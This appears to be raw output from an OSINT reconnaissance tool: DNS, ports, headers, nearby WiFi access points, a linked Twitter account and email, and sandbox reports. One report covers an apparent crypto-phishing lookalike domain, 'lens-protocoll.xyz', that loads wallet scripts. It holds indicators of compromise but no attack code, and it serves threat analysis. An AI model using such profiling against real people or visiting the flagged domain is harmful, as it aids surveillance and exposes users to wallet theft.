| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | notatestuser@gmail.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/walletconnect/walletconnect-monorepo/releases/download/1.7.8/web3-provider.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/twbs/bootstrap/blob/master/js/modal.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/jkup/focusable/blob/master/index.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://lens-protocoll.xyz/webc/index.php', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_588_IESQMMUTEX_0_519"\n "IsoScope_588_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_588_IESQMMUTEX_0_331"\n "IsoScope_588_IE_EarlyTabStart_0xea0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1416"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_588_ConnHashTable<1416>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_588_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.70:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "65.8.158.85:443"\n "151.101.1.229:443"\n "104.16.123.175:443"\n "192.30.255.113:443"\n "185.199.108.153:443"\n "185.199.108.133:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.ethers.io"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "etherum-libs.github.io"\n "github.com"\n "lens-protocoll.xyz"\n "objects.githubusercontent.com"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "unpkg.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta name="Keywords" content="Lens Protocol - Claiming App\n Lens Protocol - Claiming App a paypal\n Lens Protocol - Claiming App a binance\n Lens Protocol - Claiming App harmony"/>" (Indicator: "dir "; File: "urlref_httpslens-protocoll.xyzwebcindex.php")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'"(0, properties_1.defineReadOnly)(this, "publicKey", signingKey.compressedPublicKey);" (Source: jqueryjs_1_.js, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dffb9a278b09a9867d.tmp"\n "iexplore.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{64fca9ab-eac7-11ed-8a3e-080027a190c2}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"b38d7abaf0f5f8fb484f9be1484e98a17ea16df2_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f0438febff768476c4bd646204034239a5fc20d9_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f9fa0444b908def7e2cacce9c162c39a60167a27_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "jqueryjs_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3.min_1_.js" has type "data"- [targetUID: N/A]\n "slider_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3-provider.min_1_.js" has type "data"- [targetUID: N/A]\n "ethers-5.2.umd.min_1_.js" has type "data"- [targetUID: N/A]\n "walletbundle_1_.js" has type "UTF-8 Unicode text with very long lines with escape sequences"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ethereumjs-tx-1.3.3.min_1_.js" has type "data"- [targetUID: N/A]\n "urlref_httpslens-protocoll.xyzwebcindex.php" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "index_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "sweetalert2.all_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dark_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n 
"imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001416]\n "invisible_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "main.34d2eea7_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "axios.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ABI_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001416]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF038CF0017F8B478D.TMP" has type "data"- Location: [%TEMP%\\~DF038CF0017F8B478D.TMP]- [targetUID: 00000000-00001416]\n "~DFFB9A278B09A9867D.TMP" has type "data"- Location: [%TEMP%\\~DFFB9A278B09A9867D.TMP]- [targetUID: 00000000-00001416]\n "~DF79C8B99757FDF652.TMP" has type "data"- Location: [%TEMP%\\~DF79C8B99757FDF652.TMP]- [targetUID: 00000000-00001416]\n "~DF3E2144E69F260778.TMP" has type "data"- Location: [%TEMP%\\~DF3E2144E69F260778.TMP]- [targetUID: 00000000-00001416]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "css2_1_.css" has type "ASCII text"- [targetUID: N/A]\n "_64FCA9AB-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._64FCA9A9-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6E587A84-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "inter_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has 
type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.cookie.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "C1TXDP2K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1TXDP2K.txt]- [targetUID: 00000000-00001416]\n "NN4OYYV3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NN4OYYV3.txt]- [targetUID: 00000 |
| 2023-05-12 02:46:53 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cloudflare.com | skip.ns.cloudflare.com |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5d0de95ea502c0-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 02:52:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.screentogif.com/downloads', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e38_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_e38_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_e38_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e38_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3640"\n "IsoScope_e38_ConnHashTable<3640>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_e38_IE_EarlyTabStart_0xe94_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3640"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n 
"104.18.28.243:443"\n "192.30.255.117:443"\n "192.229.163.25:443"\n "20.125.62.241:443"\n "142.251.2.157:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.github.com"\n "c.clarity.ms"\n "platform.twitter.com"\n "query.prod.cms.msn.com"\n "stats.g.doubleclick.net"\n "teredo.ipv6.microsoft.com"\n "unicons.iconscout.com"\n "www.screentogif.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "platform.twitter.com" (Indicator: "dir "; File: "PCAP")\n file/memory contains long string with (Indicator: "dir "; File: "SSL")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"Recorder-Old.220d6f4d_1_.gif" has type "GIF image data 
version 89a 574 x 465" and extension "gif"\n "Editor.3586032f_1_.gif" has type "GIF image data version 89a 743 x 521" and extension "gif"\n "Recorder-New.e3003335_1_.gif" has type "GIF image data version 89a 408 x 369" and extension "gif"\n "Loam.343c6915_1_.png" has type "PNG image data 1000 x 1000 8-bit/color RGBA non-interlaced" and extension "png"\n "Elmah.21a45df7_1_.png" has type "PNG image data 836 x 536 8-bit/color RGBA non-interlaced" and extension "png"\n "Noderaider.be4e9c67_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=0] progressive precision 8 400x400 components 3" and extension "jpg"\n "Whsr.385f0a38_1_.png" has type "PNG image data 512 x 512 8-bit colormap non-interlaced" and extension "png"\n "Bluepoint.27f1ef7b_1_.png" has type "PNG image data 307 x 90 8-bit/color RGBA non-interlaced" and extension "png"\n "logo.d2151712_1_.png" has type "PNG image data 256 x 256 8-bit/color RGBA non-interlaced" and extension "png"\n "c_1_.gif" has type "GIF image data version 89a 1 x 1" and extension "gif"\n "collect_1_.gif" has type "GIF image data version 89a 1 x 1" and extension "gif"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df9094ab384f940ba2.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{3d8264cb-eb38-11ed-a571-080027d31f80}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\imagestore\\3mt7jhv\\imagestore.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa6cf4e6309c1db59.tmp"\n "iexplore.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{4b5d2cdb-eb38-11ed-a571-080027d31f80}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{3d8264cb-eb38-11ed-a571-080027d31f80}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{4b5d2cdb-eb38-11ed-a571-080027d31f80}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa6cf4e6309c1db59.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{3d8264c9-eb38-11ed-a571-080027d31f80}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff161ee818d5dda45.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Kreiseder.98f158f6_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Jetbrains.69724121_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Fosshub.48002ff1_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "NDepend.943229b8_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "BrunnerBi.b7b9057f_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n 
"Windows.19802f6e_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Microsoft.a1fb1c95_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "app.d1265516_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "chunk-vendors.7bff679b_1_.js" has type "UTF-8 Unicode text with very long lines with LF NEL line terminators"- [targetUID: N/A]\n "Recorder-Old.220d6f4d_1_.gif" has type "GIF image data version 89a 574 x 465"- [targetUID: N/A]\n "app.7abc533d_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "Editor.3586032f_1_.gif" has type "GIF image data version 89a 743 x 521"- [targetUID: N/A]\n "Recorder-New.e3003335_1_.gif" has type "GIF image data version 89a 408 x 369"- [targetUID: N/A]\n "js_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "widgets_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "Loam.343c6915_1_.png" has type "PNG image data 1000 x 1000 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab2DE8.tmp" has type "data"- Location: [%TEMP%\\Cab2DE8.tmp]- [targetUID: 00000000-00002720]\n "clarity_1_.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "line_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "analytics_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Elmah.21a45df7_1_.png" has type "PNG image data 836 x 536 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Noderaider.be4e9c67_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=0] progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "unicons-10_1_.eot" has type "Embedded OpenType (EOT) unicons-10 family"- [targetUID: N/A]\n "releases_1_.json" has type "JSON data"- [targetUID: N/A]\n "unicons-17_1_.eot" 
has type "Embedded OpenType (EOT) unicons-17 family"- [targetUID: N/A]\n "unicons-18_1_.eot" has type "Embedded OpenType (EOT) unicons-18 family"- [targetUID: N/A]\n "unicons-5_1_.eot" has type "Embedded OpenType (EOT) unicons-5 family"- [targetUID: N/A]\n "unicons-15_1_.eot" has type "Embedded OpenType (EOT) unicons-15 family"- [targetUID: N/A]\n "unicons-12_1_.eot" | 185.199.108.153 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.160): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Twitter (Category: social); https://twitter.com/_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 02:45:51 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:24:00 | Similar Domain | Yes | TLD Searcher | 1 | 0 | 1 | 0 | None | ayhu.de | ayhu.xyz |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.82): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2082 | 104.21.6.166 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft acquisitions | battleb0t.github.io |
| 2023-05-12 03:23:38 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.14:443 | 188.114.96.0/24 |
| 2023-05-12 03:03:34 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00d.github.io |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Open-source software hosting facilities | battleb0t.github.io |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SMC (Net ID: 00:04:E2:D0:65:C0) | 50.8897, 6.0563 |
| 2023-05-12 02:54:57 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c4567d3ec4c10ff-ORD"]} | 2a06:98c1:3120::1 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES_RT-205 (Net ID: 00:12:BF:FE:00:5F) | 40.2024, 29.0398 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PHK140 (Net ID: 00:01:E3:06:9D:0B) | 52.3759, 4.8975 |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.226 | 104.196.30.220 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | eduwifi (Net ID: 00:02:2D:54:36:B1) | 37.7642, -122.3993 |
| 2023-05-12 02:56:31 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.rstudio.com/products/rstudio/download/),', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.231.208.25:443"\n "104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9a0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_9a0_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_9a0_IESQMMUTEX_0_303"\n "IsoScope_9a0_IESQMMUTEX_0_331"\n "IsoScope_9a0_ConnHashTable<2464>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2464"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_9a0_IE_EarlyTabStart_0xf44_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual 
Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "QK1MCF28.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QK1MCF28.txt]- [targetUID: 00000000-00002464]\n "_B73DAEC5-28A5-11ED-91FC-0800278F1A1D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002464]\n "Y43HX953.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Y43HX953.txt]- [targetUID: 00000000-00002464]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n 